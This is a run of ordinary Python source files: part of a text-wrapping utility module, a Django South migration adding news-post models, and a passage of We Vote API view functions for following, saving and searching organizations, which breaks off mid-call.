if self.break_on_hyphens is True:
chunks = self.wordsep_re.split(text)
else:
chunks = self.wordsep_simple_re.split(text)
chunks = [c for c in chunks if c]
return chunks
def _fix_sentence_endings(self, chunks):
"""_fix_sentence_endings(chunks : [string])
Correct for sentence endings buried in 'chunks'. Eg. when the
original text contains "... foo.\nBar ...", munge_whitespace()
and split() will convert that to [..., "foo.", " ", "Bar", ...]
which has one too few spaces; this method simply changes the one
space to two.
"""
i = 0
patsearch = self.sentence_end_re.search
while i < len(chunks)-1:
if chunks[i+1] == " " and patsearch(chunks[i]):
chunks[i+1] = "  "
i += 2
else:
i += 1
def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
"""_handle_long_word(chunks : [string],
cur_line : [string],
cur_len : int, width : int)
Handle a chunk of text (most likely a word, not whitespace) that
is too long to fit in any line.
"""
# Figure out when indent is larger than the specified width, and make
# sure at least one character is stripped off on every pass
if width < 1:
space_left = 1
else:
space_left = width - cur_len
# If we're allowed to break long words, then do so: put as much
# of the next chunk onto the current line as will fit.
if self.break_long_words:
cur_line.append(reversed_chunks[-1][:space_left])
reversed_chunks[-1] = reversed_chunks[-1][space_left:]
# Otherwise, we have to preserve the long word intact. Only add
# it to the current line if there's nothing already there --
# that minimizes how much we violate the width constraint.
elif not cur_line:
cur_line.append(reversed_chunks.pop())
# If we're not allowed to break long words, and there's already
# text on the current line, do nothing. Next time through the
# main loop of _wrap_chunks(), we'll wind up here again, but
# cur_len will be zero, so the next line will be entirely
# devoted to the long word that we can't handle right now.
def _wrap_chunks(self, chunks):
"""_wrap_chunks(chunks : [string]) -> [string]
Wrap a sequence of text chunks and return a list of lines of
length 'self.width' or less. (If 'break_long_words' is false,
some lines may be longer than this.) Chunks correspond roughly
to words and the whitespace between them: each chunk is
indivisible (modulo 'break_long_words'), but a line break can
come between any two chunks. Chunks should not have internal
whitespace; ie. a chunk is either all whitespace or a "word".
Whitespace chunks will be removed from the beginning and end of
lines, but apart from that whitespace is preserved.
"""
lines = []
if self.width <= 0:
raise ValueError("invalid width %r (must be > 0)" % self.width)
# Arrange in reverse order so items can be efficiently popped
# from a stack of chunks.
chunks.reverse()
while chunks:
# Start the list of chunks that will make up the current line.
# cur_len is just the length of all the chunks in cur_line.
cur_line = []
cur_len = 0
# Figure out which static string will prefix this line.
if lines:
indent = self.subsequent_indent
else:
indent = self.initial_indent
# Maximum width for this line.
width = self.width - len(indent)
# First chunk on line is whitespace -- drop it, unless this
# is the very beginning of the text (ie. no lines started yet).
if self.drop_whitespace and chunks[-1].strip() == '' and lines:
del chunks[-1]
while chunks:
l = len(chunks[-1])
# Can at least squeeze this chunk onto the current line.
if cur_len + l <= width:
cur_line.append(chunks.pop())
cur_len += l
# Nope, this line is full.
else:
break
# The current line is full, and the next chunk is too big to
# fit on *any* line (not just this one).
if chunks and len(chunks[-1]) > width:
self._handle_long_word(chunks, cur_line, cur_len, width)
# If the last chunk on this line is all whitespace, drop it.
if self.drop_whitespace and cur_line and cur_line[-1].strip() == '':
del cur_line[-1]
# Convert current line back to a string and store it in list
# of all lines (return value).
if cur_line:
lines.append(indent + ''.join(cur_line))
return lines
# -- Public interface ----------------------------------------------
def wrap(self, text):
"""wrap(text : string) -> [string]
Reformat the single paragraph in 'text' so it fits in lines of
no more than 'self.width' columns, and return a list of wrapped
lines. Tabs in 'text' are expanded with string.expandtabs(),
and all other whitespace characters (including newline) are
converted to space.
"""
text = self._munge_whitespace(text)
chunks = self._split(text)
if self.fix_sentence_endings:
self._fix_sentence_endings(chunks)
return self._wrap_chunks(chunks)
def fill(self, text):
"""fill(text : string) -> string
Reformat the single paragraph in 'text' to fit in lines of no
more than 'self.width' columns, and return a new string
containing the entire wrapped paragraph.
"""
return "\n".join(self.wrap(text))
# -- Convenience interface ---------------------------------------------
def wrap(text, width=70, **kwargs):
"""Wrap a single paragraph of text, returning a list of wrapped lines.
Reformat the single paragraph in 'text' so it fits in lines of no
more than 'width' columns, and return a list of wrapped lines. By
default, tabs in 'text' are expanded with string.expandtabs(), and
all other whitespace characters (including newline) are converted to
space. See TextWrapper class for available keyword args to customize
wrapping behaviour.
"""
w = TextWrapper(width=width, **kwargs)
return w.wrap(text)
def fill(text, width=70, **kwargs):
"""Fill a single paragraph of text, returning a new string.
Reformat the single paragraph in 'text' to fit in lines of no more
than 'width' columns, and return a new string containing the entire
wrapped paragraph. As with wrap(), tabs are expanded and other
whitespace characters converted to space. See TextWrapper class for
available keyword args to customize wrapping behaviour.
"""
w = TextWrapper(width=width, **kwargs)
return w.fill(text)
# -- Loosely related functionality -------------------------------------
_whitespace_only_re = re.compile('^[ \t]+$', re.MULTILINE)
_leading_whitespace_re = re.compile('(^[ \t]*)(?:[^ \t\n])', re.MULTILINE)
def dedent(text):
"""Remove any common leading whitespace from every line in `text`.
This can be used to make triple-quoted strings line up with the left
edge of the display, while still presenting them in the source code
in indented form.
Note that tabs and spaces are both treated as whitespace, but they
are not equal: the lines " hello" and "\thello" are
considered to have no common leading whitespace. (This behaviour is
new in Python 2.5; older versions of this module incorrectly
expanded tabs before searching for common leading whitespace.)
"""
# Look for the longest leading string of spaces and tabs common to
# all lines.
margin = None
text = _whitespace_only_re.sub('', text)
indents = _leading_whitespace_re.findall(text)
for indent in indents:
if margin is None:
margin = indent
# Current line more deeply indented than previous winner:
# no change (previous winner is still on top).
elif indent.startswith(margin):
pass
# Current line consistent with and no deeper than previous winner:
# it's the new winner.
elif margin.startswith(indent):
margin = indent
# Current line and previous winner have no common whitespace:
# there is no margin.
else:
margin = ""
break
# sanity check (testing/debugging only)
if 0 and margin:
for line in text.split("\n"):
assert not line or line.startswith(margin), \
"line = %r, margin = %r" % (line, margin)
if margin:
text = re.sub(r'(?m)^' + margin, '', text)
return text
if __name__ == "__main__":
#print dedent("\tfoo\n\tbar")
#print dedent(" \thello there\n \t how are you?")
print(dedent("Hello there.\n This is indented."))
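    # Hedged usage sketch: a few of the options documented on TextWrapper above.
    # The sample text is illustrative only.
    sample = ("The quick brown fox jumped over the extraordinarily lazy dog, "
              "twice, for good measure.")
    print(fill(sample, width=30))
    print(fill(sample, width=30, initial_indent="* ", subsequent_indent="  "))
    print(wrap(sample, width=30))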
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'DummyTable'
db.create_table(u'news_dummytable', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal(u'news', ['DummyTable'])
# Adding model 'NewsPost'
db.create_table(u'news_newspost', (
(u'bccfchildpage_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['bccf.BCCFChildPage'], unique=True, primary_key=True)),
))
db.send_create_signal(u'news', ['NewsPost'])
def backwards(self, orm):
# Deleting model 'DummyTable'
db.delete_table(u'news_dummytable')
# Deleting model 'NewsPost'
db.delete_table(u'news_newspost')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'bccf.bccfchildpage': {
'Meta': {'ordering': "('titles',)", 'object_name': 'BCCFChildPage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'bccf_topic': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['bccf.BCCFTopic']", 'null': 'True', 'blank': 'True'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'gparent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.BCCFPage']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'in_menus': ('mezzanine.pages.fields.MenusField', [], {'default': '(1, 2, 3)', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'page_for': ('django.db.models.fields.CharField', [], {'default': "'Parents'", 'max_length': '13', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.BCCFChildPage']", 'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'rating': ('mezzanine.generic.fields.RatingField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.Rating']", 'frozen_by_south': 'True'}),
'rating_average': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_sum': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'bccf.bccfpage': {
'Meta': {'ordering': "('_order',)", 'object_name': 'BCCFPage', '_ormbases': [u'pages.Page']},
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
u'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'})
},
u'bccf.bccftopic': {
'Meta': {'object_name': 'BCCFTopic'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'bccf.pagemarquee': {
'Meta': {'object_name': 'PageMarquee'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'generic.assignedkeyword': {
'Meta': {'ordering': "('_order',)", 'object_name': 'AssignedKeyword'},
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'assignments'", 'to': u"orm['generic.Keyword']"}),
'object_pk': ('django.db.models.fields.IntegerField', [], {})
},
u'generic.keyword': {
'Meta': {'object_name': 'Keyword'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
u'generic.rating': {
'Meta': {'object_name': 'Rating'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_pk': ('django.db.models.fields.IntegerField', [], {}),
'rating_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ratings'", 'null': 'True', 'to': u"orm['auth.User']"}),
'value': ('django.db.models.fields.IntegerField', [], {})
},
u'news.dummytable': {
'Meta': {'object_name': 'DummyTable'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'news.newspost': {
'Meta': {'ordering': "('_order',)", 'object_name': 'NewsPost', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'})
},
u'pages.page': {
'Meta': {'ordering': "('titles',)", 'object_name': 'Page'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_menus': ('mezzanine.pages.fields.MenusField', [], {'default': '(1, 2, 3)', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': u"orm['pages.Page']"}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['news']
|
|
# apis_v1/views/views_organization.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from follow.models import UPDATE_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW, UPDATE_SUGGESTIONS_FROM_WHAT_FRIENDS_FOLLOW, \
UPDATE_SUGGESTIONS_FROM_WHAT_FRIENDS_FOLLOW_ON_TWITTER, UPDATE_SUGGESTIONS_FROM_WHAT_FRIEND_FOLLOWS, \
UPDATE_SUGGESTIONS_FROM_WHAT_FRIEND_FOLLOWS_ON_TWITTER, UPDATE_SUGGESTIONS_ALL, \
FOLLOW_SUGGESTIONS_FROM_FRIENDS_ON_TWITTER, FOLLOW_SUGGESTIONS_FROM_FRIENDS, \
FOLLOW_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW
from apis_v1.controllers import organization_count, organization_follow, organization_follow_ignore, \
organization_stop_following
from config.base import get_environment_variable
from django.http import HttpResponse
from django_user_agents.utils import get_user_agent
from follow.controllers import organization_suggestion_tasks_for_api
import json
from organization.controllers import organization_retrieve_for_api, organization_save_for_api, \
organization_search_for_api, organizations_followed_retrieve_for_api
from organization.models import UNKNOWN
from voter.models import voter_has_authority, VoterManager
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, get_voter_device_id, \
get_maximum_number_to_retrieve_from_request, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
WE_VOTE_SERVER_ROOT_URL = get_environment_variable("WE_VOTE_SERVER_ROOT_URL")
def organization_count_view(request):
return organization_count()
def organization_follow_api_view(request): # organizationFollow
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
organization_id = request.GET.get('organization_id', 0)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
organization_twitter_handle = request.GET.get('organization_twitter_handle', '')
organization_follow_based_on_issue = request.GET.get('organization_follow_based_on_issue', False)
organization_follow_based_on_issue = positive_value_exists(organization_follow_based_on_issue)
user_agent_string = request.META['HTTP_USER_AGENT']
user_agent_object = get_user_agent(request)
return organization_follow(voter_device_id=voter_device_id, organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
organization_twitter_handle=organization_twitter_handle,
organization_follow_based_on_issue=organization_follow_based_on_issue,
user_agent_string=user_agent_string, user_agent_object=user_agent_object)
def organization_stop_following_api_view(request): # organizationStopFollowing
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
organization_id = request.GET.get('organization_id', 0)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
user_agent_string = request.META['HTTP_USER_AGENT']
user_agent_object = get_user_agent(request)
return organization_stop_following(voter_device_id=voter_device_id, organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
user_agent_string=user_agent_string, user_agent_object=user_agent_object)
def organization_follow_ignore_api_view(request): # organizationFollowIgnore
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
organization_id = request.GET.get('organization_id', 0)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
user_agent_string = request.META['HTTP_USER_AGENT']
user_agent_object = get_user_agent(request)
return organization_follow_ignore(voter_device_id=voter_device_id, organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
user_agent_string=user_agent_string, user_agent_object=user_agent_object)
def organization_retrieve_view(request):
"""
Retrieve a single organization based on unique identifier
:param request:
:return:
"""
organization_id = request.GET.get('organization_id', 0)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
return organization_retrieve_for_api(
organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
voter_device_id=voter_device_id,
)
def organization_save_view(request): # organizationSave
"""
Save a single organization based on unique identifier
:param request:
:return:
"""
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
organization_email = request.GET.get('organization_email', False)
organization_description = request.GET.get('organization_description', False)
organization_facebook = request.GET.get('organization_facebook', False)
organization_id = request.GET.get('organization_id', 0)
organization_image = request.GET.get('organization_image', False)
organization_instagram_handle = request.GET.get('organization_instagram_handle', False)
organization_name = request.GET.get('organization_name', False)
organization_type = request.GET.get('organization_type', False)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
organization_website = request.GET.get('organization_website', False)
# We only want to allow save if this is your organization (i.e., you own its Twitter handle or
# Facebook id, or it is linked to your voter record), or if you have the required authority
organization_linked_to_this_voter = False
voter_owns_twitter_handle = False
voter_owns_facebook_id = False
# Twitter specific
organization_twitter_handle = request.GET.get('organization_twitter_handle', False)
refresh_from_twitter = request.GET.get('refresh_from_twitter', False)
# Facebook specific
facebook_id = request.GET.get('facebook_id', False)
if facebook_id is not False:
facebook_id = convert_to_int(facebook_id)
facebook_email = request.GET.get('facebook_email', False)
facebook_profile_image_url_https = request.GET.get('facebook_profile_image_url_https', False)
# admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer
authority_required = {'admin', 'political_data_manager', 'verified_volunteer'}
voter_has_authority_required = False
if voter_has_authority(request, authority_required):
voter_has_authority_required = True
else:
voter_manager = VoterManager()
voter_results = voter_manager.retrieve_voter_from_voter_device_id(voter_device_id)
if voter_results['voter_found']:
voter = voter_results['voter']
# Is this voter linked to this organization?
if positive_value_exists(voter.linked_organization_we_vote_id) \
and positive_value_exists(organization_we_vote_id) \
and voter.linked_organization_we_vote_id == organization_we_vote_id:
organization_linked_to_this_voter = True
# Does this voter have the same Facebook id as this organization? If so, link this organization to
# this particular voter
voter_facebook_id = voter_manager.fetch_facebook_id_from_voter_we_vote_id(voter.we_vote_id)
if positive_value_exists(voter_facebook_id) \
and positive_value_exists(facebook_id) \
and voter_facebook_id == facebook_id:
voter_owns_facebook_id = True
# Does this voter have the same Twitter handle as this organization? If so, link this organization to
# this particular voter
voter_twitter_handle = voter_manager.fetch_twitter_handle_from_voter_we_vote_id(voter.we_vote_id)
if positive_value_exists(voter_twitter_handle) \
and positive_value_exists(organization_twitter_handle) \
and voter_twitter_handle.lower() == organization_twitter_handle.lower():
voter_owns_twitter_handle = True
if not voter_has_authority_required:
if not voter_owns_twitter_handle and not voter_owns_facebook_id and not organization_linked_to_this_voter:
# Only refuse entry if *none* of the ownership conditions are met (and the voter lacks authority)
results = {
'status': "VOTER_LACKS_AUTHORITY_TO_SAVE_ORGANIZATION",
'success': False,
'facebook_id': facebook_id,
'facebook_email': facebook_email,
'facebook_profile_image_url_https': facebook_profile_image_url_https,
'new_organization_created': False,
'organization_description': organization_description,
'organization_email': organization_email,
'organization_facebook': organization_facebook,
'organization_id': organization_id,
'organization_instagram_handle': organization_instagram_handle,
'organization_name': organization_name,
'organization_photo_url': organization_image,
'organization_twitter_handle': organization_twitter_handle,
'organization_type': organization_type,
'organization_we_vote_id': organization_we_vote_id,
'organization_website': organization_website,
'refresh_from_twitter': refresh_from_twitter,
'twitter_followers_count': 0,
'twitter_description': "",
}
return HttpResponse(json.dumps(results), content_type='application/json')
results = organization_save_for_api(
voter_device_id=voter_device_id, organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
organization_name=organization_name, organization_description=organization_description,
organization_email=organization_email,
organization_website=organization_website, organization_twitter_handle=organization_twitter_handle,
organization_facebook=organization_facebook, organization_instagram_handle=organization_instagram_handle,
organization_image=organization_image,
organization_type=organization_type, refresh_from_twitter=refresh_from_twitter,
facebook_id=facebook_id, facebook_email=facebook_email,
facebook_profile_image_url_https=facebook_profile_image_url_https,
)
return HttpResponse(json.dumps(results), content_type='application/json')
def organization_search_view(request): # organizationSearch
"""
Search for organizations based on a few search terms
:param request:
:return:
"""
organization_search_term = request.GET.get('organization_search_term', '')
organization_name = request.GET.get('organization_name', '')
organization_twitter_handle = request.GET.get('organization_twitter_handle', '')
organization_website = request.GET.get('organization_website', '')
organization_email = request.GET.get('organization_email', '')
exact_match = positive_value_exists(request.GET.get('exact_match', False))
return organization_search_for_api(organization_search_term=organization_search_term,
organization_name=organization_name,
organization_twitter_handle=organization_twitter_handle,
organization_website=organization_website,
organization_email=organization_email,
exact_match=exact_match)
def organization_suggestion_tasks_view(request):
"""
This will provide a list of suggested organizations to follow.
These suggestions are generated from the Twitter ids I follow, or from the organizations my friends follow.
:param request:
:return:
"""
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
kind_of_suggestion_task = request.GET.get('kind_of_suggestion_task',
UPDATE_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW)
kind_of_follow_task = request.GET.get('kind_of_follow_task', '')
if kind_of_suggestion_task not in (UPDATE_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW,
UPDATE_SUGGESTIONS_FROM_WHAT_FRIENDS_FOLLOW,
UPDATE_SUGGESTIONS_FROM_WHAT_FRIENDS_FOLLOW_ON_TWITTER,
UPDATE_SUGGESTIONS_FROM_WHAT_FRIEND_FOLLOWS,
UPDATE_SUGGESTIONS_FROM_WHAT_FRIEND_FOLLOWS_ON_TWITTER,
UPDATE_SUGGESTIONS_ALL):
kind_of_suggestion_task = UPDATE_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW
if kind_of_follow_task not in (FOLLOW_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW, FOLLOW_SUGGESTIONS_FROM_FRIENDS,
FOLLOW_SUGGESTIONS_FROM_FRIENDS_ON_TWITTER):
kind_of_follow_task = ''
results = organization_suggestion_tasks_for_api(voter_device_id=voter_device_id,
kind_of_suggestion_task=kind_of_suggestion_task,
kind_of_follow_task=kind_of_follow_task)
json_data = {
'status': results['status'],
'success': results['success'],
'voter_device_id': voter_device_id,
'kind_of_suggestion_task': kind_of_suggestion_task,
'kind_of_follow_task': kind_of_follow_task,
'organization_suggestion_task_saved': results['organization_suggestion_task_saved'],
'organization_suggestion_list': results['organization_suggestion_list'],
'organization_suggestion_followed_list': results['organization_suggestion_followed_list']
}
return HttpResponse(json.dumps(json_data), content_type='application/json')
def organizations_followed_retrieve_api_view(request): # organizationsFollowedRetrieve
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
maximum_number_to_retrieve = get_maximum_number_to_retrieve_from_request(request)
auto_followed_from_twitter_suggestion = request.GET.get('auto_followed_from_twitter_suggestion', False)
return organizations_followed_retrieve_for_api(voter_device_id=voter_device_id,
